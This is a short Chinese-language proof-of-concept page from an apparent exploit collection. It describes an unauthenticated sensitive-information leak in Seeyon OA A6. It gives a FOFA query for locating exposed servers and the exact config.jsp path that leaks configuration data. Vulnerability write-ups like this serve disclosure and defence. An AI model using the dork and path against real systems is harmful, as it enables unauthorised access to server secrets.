Awesome-POC/OA产品漏洞/致远OA A6 config.jsp 敏感信息泄漏漏洞.md
2022-05-20 15:57:09 +08:00

31 lines
620 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# 致远OA A6 config.jsp 敏感信息泄漏漏洞
## 漏洞描述
致远OA A6 config.jsp页面可未授权访问导致敏感信息泄漏漏洞攻击者通过漏洞可以获取服务器中的敏感信息
## 漏洞影响
```
致远OA A6
```
## FOFA
```
body="yyoa" && app="致远互联-OA"
```
## 漏洞复现
登录页面
![image-20220520152551136](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205201525328.png)
验证POC
```
/yyoa/ext/trafaxserver/SystemManage/config.jsp
```
![image-20220520152601778](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205201526835.png)